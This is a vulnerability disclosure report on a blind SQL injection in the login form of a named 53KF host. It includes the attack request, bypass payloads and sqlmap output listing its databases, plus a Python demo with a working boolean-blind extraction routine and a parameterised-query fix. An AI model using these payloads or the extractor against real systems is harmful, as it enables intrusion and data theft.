### Summary:
Blind MySQL injection in a 53KF backend (database user root)
### Details:
Injection point:
```
POST /check.php HTTP/1.1
Content-Length: 166
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://hlm.53kf.com
Host: hlm.53kf.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/600.1.3 (KHTML, like Gecko) Version/8.0 Mobile/12A4345d Safari/600.1.4
Accept: */*
Submit=&action=login&name=admin' or 1=1* or '1aa'='1&pwd=test
```
The `name` parameter is injectable. It is a very simple injection, yet sqlmap would not detect it even with `--risk=3`, so I tweaked the parameter to make the injection more obvious (the `*` marks the injection position for sqlmap):
```
admin' or 1=1* or '1aa'='1
```
### Proof of vulnerability:
Username input: `admin' or 1=1 or '1'='--`
This logs straight into the backend:
![53kf.png](https://images.seebug.org/upload/201505/19211236bc51c5bf24c0d02c8c96cccc0dc3f7a6.png)
Running sqlmap against it:
```
current user: 'root@localhost'
current database: 'hlm'
available databases [53]:
[*] `13jian`
[*] bak
[*] entalk
[*] hk_kf
[*] hk_kf1
[*] hk_talk
[*] hlm
[*] income
[*] information_schema
[*] ip
[*] ip2
[*] ip_110711
[*] ip_src
[*] kf
[*] kf1
[*] mysql
[*] oem
[*] oem_168kf_kf
[*] oem_168kf_kf1
[*] oem_168kf_talk
[*] oem_del
[*] oem_ekt_kf
[*] oem_ekt_kf1
[*] oem_ekt_talk
[*] oem_old
[*] oem_test
[*] oem_tzchat_kf
[*] oem_tzchat_kf1
[*] oem_tzchat_kf1_new
[*] oem_tzchat_kf_new
[*] oem_tzchat_talk
[*] oem_tzchat_talk_new
[*] oem_wb_kf
[*] oem_wb_kf1
[*] oem_wb_talk
[*] oem_yitian_kf
[*] oem_yitian_kf1
[*] oem_yitian_kf1_new
[*] oem_yitian_kf_new
[*] oem_yitian_talk
[*] oem_yitian_talk_new
[*] oem_ywdj_kf
[*] oem_ywdj_kf1
[*] oem_ywdj_talk
[*] srv_kf
[*] srv_kf1
[*] srv_talk
[*] stat
[*] talk
[*] test
[*] tw
[*] tw1
[*] twtalk
```
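As an added illustration, not code from the original report or from 53KF, the following Python model of the login check shows why `admin' or 1=1 or '1'='--` logs in, why the same input does nothing against a parameterised query, and how the bare success/failure of the login is already enough of an oracle to pull data out one character at a time, which is what sqlmap's boolean-blind technique automated above. SQLite stands in for MySQL, and the table name, column names and stored credential are assumptions for the demo; the real schema behind `check.php` is not in the report.

```python
import sqlite3
import string

# Constructed fixture standing in for the backend's user table. The real
# schema behind check.php is not in the report; the table name, column names
# and the stored password are assumptions for this demo.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin_user (name TEXT, pwd TEXT)")
    conn.execute("INSERT INTO admin_user VALUES ('admin', 'S3cret')")
    conn.commit()
    return conn


def login_vulnerable(conn, name, pwd):
    """String-concatenated query: the pattern the report's payloads abuse."""
    sql = f"SELECT name FROM admin_user WHERE name='{name}' AND pwd='{pwd}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, name, pwd):
    """Same check with bound parameters: input never reaches the parser as SQL."""
    sql = "SELECT name FROM admin_user WHERE name=? AND pwd=?"
    return conn.execute(sql, (name, pwd)).fetchone() is not None


# The bypass from the proof section. After concatenation the WHERE clause is
#   name='admin' or 1=1 or '1'='--' AND pwd='test'
# AND binds tighter than OR, so the row matches regardless of pwd.
BYPASS = "admin' or 1=1 or '1'='--"


def blind_extract(conn, expr, max_len=32, charset=string.printable[:-5]):
    """Boolean-blind extraction using only login success/failure as the oracle.

    expr is a scalar SQL expression (e.g. a sub-select) evaluated on the server;
    each guessed character costs one request against the login form.
    """
    out = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            ch_sql = ch.replace("'", "''")
            # name='x' is false, '1'='' AND ... is false, so the login succeeds
            # exactly when the guessed character is right.
            payload = f"x' or substr(({expr}),{pos},1)='{ch_sql}' or '1'='"
            if login_vulnerable(conn, payload, "test"):
                out += ch
                break
        else:
            return out  # no character matched: end of the string
    return out


if __name__ == "__main__":
    db = make_db()
    print("vulnerable login with bypass:", login_vulnerable(db, BYPASS, "test"))
    print("fixed login with bypass:     ", login_fixed(db, BYPASS, "test"))
    print("blind-extracted password:    ",
          blind_extract(db, "SELECT pwd FROM admin_user WHERE name='admin'"))
```

Two caveats worth noting. The `*` in the `name=admin' or 1=1* ...` payload is sqlmap's injection marker, not SQL, so it must not be sent literally. And the trailing `--` in the proof payload is not a comment in MySQL (that needs a following space); it is simply the content of the final string literal, and the bypass works purely because of `AND`/`OR` precedence. The fix is the second function: bind every user-supplied value as a parameter (PDO or mysqli prepared statements in PHP) and never build the query with string concatenation.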